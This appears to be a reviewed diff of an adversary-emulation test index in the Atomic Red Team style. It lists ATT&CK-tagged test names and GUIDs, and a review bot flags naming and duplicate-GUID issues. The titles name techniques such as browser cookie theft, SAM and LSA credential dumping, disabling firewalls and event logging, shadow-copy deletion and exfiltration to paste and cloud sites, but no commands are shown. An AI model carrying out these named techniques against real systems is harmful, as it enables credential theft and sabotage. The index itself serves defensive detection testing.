lateral-movement,T1021.005,Remote Services:VNC,1,Enable Apple Remote Desktop Agent,8a930abe-841c-4d4f-a877-72e9fe90b9ea,sh
lateral-movement,T1021.004,Remote Services: SSH,1,ESXi - Enable SSH via PowerCLI,8f6c14d1-f13d-4616-b7fc-98cc69fe56ec,powershell
lateral-movement,T1021.004,Remote Services: SSH,2,ESXi - Enable SSH via VIM-CMD,280812c8-4dae-43e9-a74e-1d08ab997c0e,command_prompt
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
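Review bot: the new row uses the technique name "Remote Services:VNC" with no space after the colon, while the neighbouring rows use "Remote Services: SSH" and "Remote Services: SMB/Windows Admin Shares". Suggest "Remote Services: VNC" so the name matches the convention used elsewhere in the index.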
@@ -1516,6 +1542,8 @@ credential-access,T1003,OS Credential Dumping,7,Send NTLM Hash with RPC Test Con
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -1530,6 +1558,7 @@ credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking w
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain Dump,88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,2,Export Certificate Item(s),1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,3,Import Certificate Item(s) into Keychain,e544bbcb-c4e0-4bd0-b614-b92131635f59,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,4,Copy Keychain using cat utility,5c32102a-c508-49d3-978f-288f8a9f6617,sh
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,2,Dump Kerberos Tickets from LSA using dumper.ps1,2dfa3bff-9a27-46db-ab75-7faefdaca732,powershell
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
@@ -1631,7 +1660,7 @@ credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Cra
credential-access,T1649,Steal or Forge Authentication Certificates,1,Staging Local Certificates via Export-Certificate,eb121494-82d1-4148-9e2b-e624e03fbf3d,powershell
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,37807632-d3da-442e-8c2e-00f44928ff8f,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
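Review bot: this hunk keeps the name and number of "Find AWS credentials" (test 1) but swaps its GUID from 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 to 37807632-d3da-442e-8c2e-00f44928ff8f. Changing the identifier of an existing test silently breaks any detection mapping or automation that references the old GUID; if this is really a new test it should get the next free number rather than reuse 1, and if it is the same test the original GUID should be kept.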
@@ -1645,6 +1674,9 @@ credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPw
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,13,List Credential Files via PowerShell,0d4f2281-f720-4572-adc8-d5bb1618affe,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List Credential Files via Command Prompt,b0cdacf6-8949-4ffe-9274-a9643a788e55,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
@@ -1742,11 +1774,15 @@ discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and group
discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1087.001,Account Discovery: Local Account,11,ESXi - Local Account Discovery via ESXCLI,9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c,command_prompt
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
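Review bot: same issue as in the defense-evasion hunk above, the "(MacOS)" and "via ioreg" rows under discovery T1497.001 share test number 4 and GUID a960185f-aef6-4547-8350-d1ce16680d09. Confirm the MacOS row is the removed line so the discovery index does not end up with two rows under one identifier.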
@@ -1836,6 +1872,8 @@ discovery,T1082,System Information Discovery,35,"Check OS version via ""ver"" co
discovery,T1082,System Information Discovery,36,"Display volume shadow copies with ""vssadmin""",7161b085-816a-491f-bab4-d68e974b7995,command_prompt
discovery,T1082,System Information Discovery,37,Identify System Locale and Regional Settings with PowerShell,ce479c1a-e8fa-42b2-812a-96b0f2f4d28a,command_prompt
discovery,T1082,System Information Discovery,38,Enumerate Available Drives via gdr,c187c9bc-4511-40b3-aa10-487b2c70b6a5,command_prompt
discovery,T1082,System Information Discovery,39,Discover OS Product Name via Registry,be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7,command_prompt
discovery,T1082,System Information Discovery,40,Discover OS Build Number via Registry,acfcd709-0013-4f1e-b9ee-bc1e7bafaaec,command_prompt
discovery,T1016.002,System Network Configuration Discovery: Wi-Fi Discovery,1,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,53cf1903-0fa7-4177-ab14-f358ae809eec,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1497.003,Time Based Evasion,1,Delay execution with ping,8b87dd03-8204-478c-bac3-3959f6528de3,sh
@@ -1919,6 +1957,8 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,5,Disco
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,7,Discover System Language with dism.exe,69f625ba-938f-4900-bdff-82ada3df5d9c,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,8,Discover System Language by Windows API Query,e39b99e9-ce7f-4b24-9c88-0fbad069e6c6,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,9,Discover System Language with WMIC,4758003d-db14-4959-9c0f-9e87558ac69e,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,10,Discover System Language with Powershell,1f23bfe8-36d4-49ce-903a-19a1e8c6631b,powershell
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
@@ -1939,6 +1979,8 @@ discovery,T1518.001,Software Discovery: Security Software Discovery,9,Security S
discovery,T1518.001,Software Discovery: Security Software Discovery,10,Security Software Discovery - Windows Firewall Enumeration,9dca5a1d-f78c-4a8d-accb-d6de67cfed6b,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,11,Get Windows Defender exclusion settings using WMIC,e31564c8-4c60-40cd-a8f4-9261307e8336,command_prompt
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
discovery,T1526,Cloud Service Discovery,2,AWS - Enumerate common cloud services,aa8b9bcc-46fa-4a59-9237-73c7b93a980c,powershell
discovery,T1526,Cloud Service Discovery,3,Azure - Enumerate common cloud services,58f57c8f-db14-4e62-a4d3-5aaf556755d7,powershell
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
@@ -1972,6 +2014,7 @@ discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
discovery,T1046,Network Service Discovery,10,Port-Scanning /24 Subnet with PowerShell,05df2a79-dba6-4088-a804-9ca0802ca8e4,powershell
discovery,T1046,Network Service Discovery,11,Remote Desktop Services Discovery via PowerShell,9e55750e-4cbf-4013-9627-e9a045b541bf,powershell
discovery,T1046,Network Service Discovery,12,Port Scan using nmap (Port range),0d5a2b03-3a26-45e4-96ae-89485b4d1f97,sh
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
@@ -1984,7 +2027,9 @@ discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d571
discovery,T1124,System Time Discovery,3,System Time Discovery in FreeBSD/macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
discovery,T1124,System Time Discovery,6,Discover System Time Zone via Registry,25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47,command_prompt
reconnaissance,T1592.001,Gather Victim Host Information: Hardware,1,Enumerate PlugNPlay Camera,d430bf85-b656-40e7-b238-42db01df0183,powershell
reconnaissance,T1595.003,Active Scanning: Wordlist Scanning,1,Web Server Wordlist Scan,89a83c3e-0b39-4c80-99f5-c2aa084098bd,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
@@ -1994,6 +2039,7 @@ impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,3
impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
@@ -2017,6 +2063,7 @@ impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDele
impact,T1485,Data Destruction,2,FreeBSD/macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,sh
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
impact,T1485,Data Destruction,5,ESXi - Delete VM Snapshots,1207ddff-f25b-41b3-aa0e-7c26d2b546d1,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -2043,6 +2090,7 @@ impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,6130
impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
impact,T1529,System Shutdown/Reboot,13,ESXi - Terminates VMs using pkill,987c9b4d-a637-42db-b1cb-e9e242c3991b,command_prompt
impact,T1529,System Shutdown/Reboot,14,ESXi - Avoslocker enumerates VMs and forcefully kills VMs,189f7d6e-9442-4160-9bc3-5e4104d93ece,command_prompt
impact,T1529,System Shutdown/Reboot,15,ESXi - vim-cmd Used to Power Off VMs,622cc1a0-45e7-428c-aed7-c96dd605fbe6,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.002,Phishing: Spearphishing Link,1,Paste and run technique,bc177ef9-6a12-4ebc-a2ec-d41e19c2791d,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
@@ -2079,8 +2127,10 @@ exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration u
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,2,Exfiltrate data with rclone to cloud Storage - AWS S3,a4b74723-5cee-4300-91c3-5e34166909b4,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
89 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
90 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (FreeBSD) e129d73b-3e03-4ae9-bf1e-67fc8921e0fd sh
91 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
92 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment (MacOS) Detect Virtualization Environment via ioreg a960185f-aef6-4547-8350-d1ce16680d09 sh
93 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 5 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
94 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 6 Detect Virtualization Environment using sysctl (hw.model) 6beae646-eb4c-4730-95be-691a4094408c sh
95 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 7 Check if System Integrity Protection is enabled 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945 sh
96 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 8 Detect Virtualization Environment using system_profiler e04d2e89-de15-4d90-92f9-a335c7337f0f sh
97 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
98 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 2 rm -rf bd8ccc45-d632-481e-b7cf-c467627d68f9 sh
99 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 3 Delete log files using built-in log utility 653d39cd-bae7-499a-898c-9fb96b8b5cd1 sh
131 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
132 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
133 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
134 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 6 SubInAcl Execution a8568b10-9ab9-4140-a523-1c72e0176924 command_prompt
135 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 1 Msiexec.exe - Execute Local MSI file with embedded JScript a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 command_prompt
136 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 2 Msiexec.exe - Execute Local MSI file with embedded VBScript 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 command_prompt
137 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
158 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 11 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
159 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 12 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
160 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 13 Set Custom AddToHistoryHandler to Avoid History File Logging 1d0d9aa6-6111-4f89-927b-53e8afae7f94 powershell
161 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 14 Clear PowerShell Session History 22c779cd-9445-4d3e-a136-f75adbf0315f powershell
162 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
163 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
164 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
236 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 5 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
237 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 6 Disable Event Logging with wevtutil b26a3340-dad7-4360-9176-706269c74103 command_prompt
238 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 7 Makes Eventlog blind with Phant0m 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741 command_prompt
239 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 8 Modify Event Log Channel Access Permissions via Registry - PowerShell 8e81d090-0cd6-4d46-863c-eec11311298f powershell
240 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 9 Modify Event Log Channel Access Permissions via Registry 2 - PowerShell 85e6eff8-3ed4-4e03-ae50-aa6a404898a5 powershell
241 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 10 Modify Event Log Access Permissions via Registry - PowerShell a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1 powershell
242 defense-evasion T1218.002 Signed Binary Proxy Execution: Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
243 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 1 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
244 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
264 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 22 Blackbit - Disable Windows Firewall using netsh firewall 91f348e6-3760-4997-a93b-2ceee7f254ee command_prompt
265 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 23 ESXi - Disable Firewall via Esxcli bac8a340-be64-4491-a0cc-0985cb227f5a command_prompt
266 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 24 Set a firewall rule using New-NetFirewallRule 94be7646-25f6-467e-af23-585fb13000c8 powershell
267 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 25 ESXi - Set Firewall to PASS Traffic a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d command_prompt
268 defense-evasion T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking 1 SIP (Subject Interface Package) Hijacking via Custom DLL e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675 command_prompt
269 defense-evasion T1562.012 Impair Defenses: Disable or Modify Linux Audit System 1 Delete all auditd rules using auditctl 33a29ab1-cabb-407f-9448-269041bf2856 sh
270 defense-evasion T1562.012 Impair Defenses: Disable or Modify Linux Audit System 2 Disable auditd using auditctl 7906f0a6-b527-46ee-9026-6e81a9184e08 sh
401 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 7 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
402 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 8 LockBit Black - Disable the ETW Provider of Windows Defender -cmd f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 command_prompt
403 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 9 LockBit Black - Disable the ETW Provider of Windows Defender -Powershell 69fc085b-5444-4879-8002-b24c8e1a3e02 powershell
404 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 10 Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd fdac1f79-b833-4bab-b4a1-11b1ed676a4b command_prompt
405 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 11 Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell b42c1f8c-399b-47ae-8fd8-763181395fee powershell
406 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 12 Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd 110b4281-43fe-405f-a184-5d8eaf228ebf command_prompt
407 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 13 Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell 4d61779d-be7f-425c-b560-0cafb2522911 powershell
408 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
409 defense-evasion T1070 Indicator Removal on Host 2 Indicator Manipulation using FSUtil 96e86706-6afd-45b6-95d6-108d23eaf2e9 powershell
410 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
